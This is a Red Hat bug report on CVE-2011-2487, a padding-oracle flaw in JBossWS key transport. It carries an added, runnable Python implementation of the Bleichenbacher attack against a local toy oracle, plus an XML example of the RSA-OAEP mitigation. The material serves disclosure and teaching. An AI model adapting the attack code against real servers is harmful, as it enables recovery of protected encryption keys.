Bug 713539 - (CVE-2011-2487) CVE-2011-2487 jbossws: Prone to Bleichenbacher attack against to be distributed symmetric key
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability
Priority: high
Severity: high
Assigned To: Red Hat Product Security
impact=important,public=20120904,repo...
Keywords: Security
Depends On: 883217 883218 883219 883220 883221 883222 918348
Blocks: 751414 789173 835396 849517 883225
Reported: 2011-06-15 13:47 EDT by Jan Lieskovsky
Modified: 2015-07-31 08:44 EDT (History)

Doc Type: Bug Fix
Last Closed: 2013-11-21 21:28:18 EST
Description Jan Lieskovsky 2011-06-15 13:47:15 EDT
It was found that JBossWS, a J2EE Web Services server, leaked further
channel data by using the PKCS#1 v1.5 protocol family / public key encryption
scheme in order to distribute the symmetric key. A remote attacker, aware
of a cryptographic weakness of the PKCS#1 v1.5 public key encryption scheme,
could use this flaw to conduct chosen-encrypted-key attacks, leading to the
recovery of the entire plaintext form of the intended symmetric key to be
distributed, by examining the differences between SOAP responses sent
from the JBossWS server.

Acknowledgements:

Red Hat would like to thank Juraj Somorovsky of Ruhr-University Bochum
for reporting this issue.
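The attack the description refers to, as an added example that is not part of the bug report, JBossWS or WSS4J: a textbook Bleichenbacher padding-oracle attack on PKCS#1 v1.5 RSA encryption. The server side is modelled by a local `padding_oracle` function that answers only whether a ciphertext decrypts to a block starting with 00 02; in the JBossWS case that single bit was inferred from differing SOAP responses, but the interval-narrowing arithmetic is the same. The 150-bit key built from two Mersenne primes, the seeded padding RNG and the six-byte "symmetric key" are constructed inputs for the demo, not values from the report.

```python
import random

# Added example, not code from the bug report, JBossWS or WSS4J: a textbook
# Bleichenbacher (1998) attack on PKCS#1 v1.5 RSA encryption driven by a
# padding oracle. For JBossWS the oracle was the difference between SOAP
# responses; here it is a local function that decrypts and checks the padding,
# which is the same one-bit leak in its simplest form.

# Toy key (assumption for the demo): two Mersenne primes, M61 and M89, giving a
# 150-bit modulus. Far too small for real use, large enough for the arithmetic.
P = (1 << 61) - 1
Q = (1 << 89) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8      # modulus length in bytes (19)
B = 1 << (8 * (K - 2))             # a conformant block lies in [2B, 3B)


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def pkcs1_v15_encrypt(msg: bytes, rng: random.Random) -> int:
    """EME-PKCS1-v1_5: 00 02 <non-zero random PS> 00 <msg>, then RSA."""
    if len(msg) > K - 11:
        raise ValueError("message too long for this modulus")
    ps = bytes(rng.randrange(1, 256) for _ in range(K - 3 - len(msg)))
    em = int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")
    return pow(em, E, N)


def padding_oracle(c: int) -> bool:
    """Stand-in for the vulnerable server: answers only whether the decrypted
    block starts with 00 02, i.e. lies in [2B, 3B). Nothing else is returned."""
    return pow(c, D, N).to_bytes(K, "big")[:2] == b"\x00\x02"


def _merge(intervals):
    intervals.sort()
    merged = [intervals[0]]
    for a, b in intervals[1:]:
        if a <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], b))
        else:
            merged.append((a, b))
    return merged


def bleichenbacher(c0: int, oracle) -> tuple:
    """Recover m = c0^d mod n from the oracle alone. Returns (m, query count)."""
    queries = 0

    def conformant(s: int) -> bool:
        nonlocal queries
        queries += 1
        return oracle(c0 * pow(s, E, N) % N)   # submits (s*m)^e without knowing m

    M = [(2 * B, 3 * B - 1)]           # c0 is genuine, so m is conformant (s0 = 1)
    s = ceil_div(N, 3 * B)             # step 2.a: smallest multiplier that can wrap
    while not conformant(s):
        s += 1
    while True:
        # step 3: intersect each interval with the pre-images of [2B, 3B) under
        # multiplication by s, one candidate per possible wrap count r
        new_M = []
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = _merge(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries
        if len(M) > 1:                 # step 2.b: several intervals, keep scanning s
            s += 1
            while not conformant(s):
                s += 1
        else:                          # step 2.c: one interval, roughly halve it
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), N)
            while True:
                hit = next((t for t in range(ceil_div(2 * B + r * N, b),
                                             (3 * B - 1 + r * N) // a + 1)
                            if conformant(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1


def demo(key: bytes, seed: int = 2487) -> tuple:
    """Wrap `key` (constructed input) with a seeded RNG, then recover it through
    the oracle alone. Returns (recovered_key, number_of_oracle_queries)."""
    c = pkcs1_v15_encrypt(key, random.Random(seed))
    m, queries = bleichenbacher(c, padding_oracle)
    em = m.to_bytes(K, "big")
    return em[em.index(b"\x00", 2) + 1:], queries


if __name__ == "__main__":
    recovered, q = demo(b"\x13\x37\xca\xfe\xba\xbe")
    print("recovered key", recovered.hex(), "after", q, "oracle queries")
```

The attacker never sees a decryption; every query is a fresh ciphertext `(s*m)^e mod n` and the only answer is the oracle's yes/no, yet the wrapped key comes back in full after a few tens of thousands of queries at this key size. Real oracles such as the SOAP response differences are noisier and the oracle usually checks more of the padding than the leading 00 02, which raises the query count but does not remove the leak; that is why the remedy is to stop using RSA-v1.5 key transport rather than to tidy up error messages.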
Comment 7 Jan Lieskovsky 2011-06-23 09:55:25 EDT
The CVE identifier of CVE-2011-2487 has been assigned to this issue.
Comment 33 David Jorm 2012-11-20 20:42:27 EST
Statement:

This flaw affects Apache CXF (WSS4J) and jbossws-native as shipped with various JBoss products. It does not affect JBoss Enterprise Application Platform 6 and JBoss Application Server 7.1.1 and above. These products include WSS4J 1.6.5, which incorporates a fix for this flaw. On affected products, this flaw can be mitigated by using the RSA-OAEP key wrap algorithm, instead of the default RSA-v1.5 algorithm. To use RSA-OAEP, edit the jboss-ws-security configuration file and add the property keyWrapAlgorithm="rsa_oaep" to the encrypt element.
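The mitigation from the statement above in descriptor form, as an added illustration that is not from the bug report or the JBossWS project: the `encrypt` element of a jbossws-native `jboss-ws-security` descriptor as it is commonly written (defaulting to RSA-v1.5 key transport), followed by the same element with `keyWrapAlgorithm="rsa_oaep"`. Only the `encrypt` element and the `keyWrapAlgorithm` attribute come from the statement; the surrounding elements, namespace, keystore paths and alias are an assumed layout of the descriptor and should be checked against the schema of the jbossws version in use.

```xml
<!-- Assumed jboss-ws-security descriptor layout (illustrative, not from the bug report).
     Before: no keyWrapAlgorithm, so the symmetric key is wrapped with RSA-v1.5
     and the decrypting endpoint behaves as a PKCS#1 v1.5 padding oracle. -->
<jboss-ws-security xmlns="http://www.jboss.com/ws-security/config">
  <key-store-file>WEB-INF/wsse.keystore</key-store-file>
  <key-store-password>changeit</key-store-password>
  <trust-store-file>WEB-INF/wsse.truststore</trust-store-file>
  <trust-store-password>changeit</trust-store-password>
  <config>
    <encrypt type="x509v3" alias="wsse"/>
    <requires>
      <encryption/>
    </requires>
  </config>
</jboss-ws-security>

<!-- After: key transport switched to RSA-OAEP as the statement above describes. -->
<jboss-ws-security xmlns="http://www.jboss.com/ws-security/config">
  <key-store-file>WEB-INF/wsse.keystore</key-store-file>
  <key-store-password>changeit</key-store-password>
  <trust-store-file>WEB-INF/wsse.truststore</trust-store-file>
  <trust-store-password>changeit</trust-store-password>
  <config>
    <encrypt type="x509v3" alias="wsse" keyWrapAlgorithm="rsa_oaep"/>
    <requires>
      <encryption/>
    </requires>
  </config>
</jboss-ws-security>
```

Changing what the sender emits is only half of the fix: the oracle lives on the decrypting side, and an attacker submits their own messages, so the receiver must also refuse RSA-v1.5-wrapped keys. The WSS4J 1.6.5 fix referenced in the statement rejects RSA v1.5 key transport by default; with the descriptor-only workaround, confirm that the endpoint does not still accept v1.5 ciphertexts from clients.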
Comment 36 Vincent Danen 2012-12-11 14:11:55 EST
Upstream advisory for Apache CXF:

http://cxf.apache.org/note-on-cve-2011-2487.html
Comment 37 errata-xmlrpc 2013-01-24 13:09:05 EST
This issue has been addressed in the following products:

  JBoss Enterprise Application Platform 5.2.0

Via RHSA-2013:0194 https://rhn.redhat.com/errata/RHSA-2013-0194.html
Comment 38 errata-xmlrpc 2013-01-24 13:32:11 EST
This issue has been addressed in the following products:

  JBEAP 5 for RHEL 5

Via RHSA-2013:0192 https://rhn.redhat.com/errata/RHSA-2013-0192.html
Comment 39 errata-xmlrpc 2013-01-24 13:32:57 EST
This issue has been addressed in the following products:

  JBEAP 5 for RHEL 6

Via RHSA-2013:0191 https://rhn.redhat.com/errata/RHSA-2013-0191.html
Comment 40 errata-xmlrpc 2013-01-24 13:45:15 EST
This issue has been addressed in the following products:

  JBEWP 5 for RHEL 6

Via RHSA-2013:0195 https://rhn.redhat.com/errata/RHSA-2013-0195.html
Comment 41 errata-xmlrpc 2013-01-24 13:46:00 EST
This issue has been addressed in the following products:

  JBEAP 5 for RHEL 4

Via RHSA-2013:0193 https://rhn.redhat.com/errata/RHSA-2013-0193.html
Comment 42 errata-xmlrpc 2013-01-24 13:58:15 EST
This issue has been addressed in the following products:

  JBEWP 5 for RHEL 4

Via RHSA-2013:0197 https://rhn.redhat.com/errata/RHSA-2013-0197.html
Comment 43 errata-xmlrpc 2013-01-24 13:59:07 EST
This issue has been addressed in the following products:

  JBEWP 5 for RHEL 5

Via RHSA-2013:0196 https://rhn.redhat.com/errata/RHSA-2013-0196.html
Comment 44 errata-xmlrpc 2013-01-24 14:07:56 EST
This issue has been addressed in the following products:

  JBoss Enterprise Web Platform 5.2.0

Via RHSA-2013:0198 https://rhn.redhat.com/errata/RHSA-2013-0198.html
Comment 45 errata-xmlrpc 2013-01-31 15:31:02 EST
This issue has been addressed in the following products:

  JBoss Enterprise BRMS Platform 5.3.1

Via RHSA-2013:0221 https://rhn.redhat.com/errata/RHSA-2013-0221.html
Comment 46 errata-xmlrpc 2013-02-20 16:43:30 EST
This issue has been addressed in the following products:

  JBoss Enterprise SOA Platform 5.3.1

Via RHSA-2013:0533 https://rhn.redhat.com/errata/RHSA-2013-0533.html
Comment 47 errata-xmlrpc 2013-06-18 10:49:02 EDT
This issue has been addressed in the following products:

  Red Hat JBoss Portal 5.2.2

Via RHSA-2013:0953 https://rhn.redhat.com/errata/RHSA-2013-0953.html
Comment 48 errata-xmlrpc 2013-11-21 19:41:42 EST
This issue has been addressed in the following products:

  Red Hat JBoss SOA Platform 4.3 CP05
  Red Hat JBoss Portal 4.3 CP07

Via RHSA-2013:1757 https://rhn.redhat.com/errata/RHSA-2013-1757.html
